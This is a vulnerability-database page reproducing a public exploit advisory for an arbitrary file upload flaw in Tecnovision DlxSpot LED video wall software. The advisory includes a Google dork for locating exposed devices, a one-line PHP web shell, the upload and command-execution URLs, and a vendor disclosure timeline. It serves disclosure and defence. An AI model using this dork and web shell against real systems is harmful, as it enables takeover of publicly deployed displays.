Vulners
Lucene search
Tecnovision DLX Spot - Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 30 |
|---|---|---|---|---|
 | Tecnovision DLX Spot - SSH Backdoor Vulnerability | 19 Sep 201700:00 | – | zdt |
| Tecnovision DLX Spot - Authentication Bypass Vulnerability | 19 Sep 201700:00 | – | zdt |
| Tecnovision DLX Spot - Arbitrary File Upload Vulnerability | 19 Sep 201700:00 | – | zdt |
 | TecnoVISION DLX Spot Player4 Elevation of Privilege Vulnerability | 22 Sep 201700:00 | – | cnvd |
| TecnoVISION DLX Spot Player4 Arbitrary File Upload Vulnerability | 22 Sep 201700:00 | – | cnvd |
| TecnoVISION DLX Spot Player4 SQL Injection Vulnerability | 22 Sep 201700:00 | – | cnvd |
 | CVE-2017-12928 | 21 Sep 201716:00 | – | cve |
| CVE-2017-12929 | 21 Sep 201716:00 | – | cve |
| CVE-2017-12930 | 21 Sep 201716:00 | – | cve |
 | CVE-2017-12928 | 21 Sep 201716:00 | – | cvelist |
10
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12929
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Arbitrary File Upload leading to Remote Command Execution:
1. Visit http://host/resource.php and upload PHP shell. For example: <?php
system($_GET["c"]); ?>
2. RCE via http://host/resource/source/shell.php?c=id
3. Output: www-data
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2017 00:00Current
9.3High risk
Vulners AI Score9.3
CVSS 39.8
CVSS 210
EPSS0.03913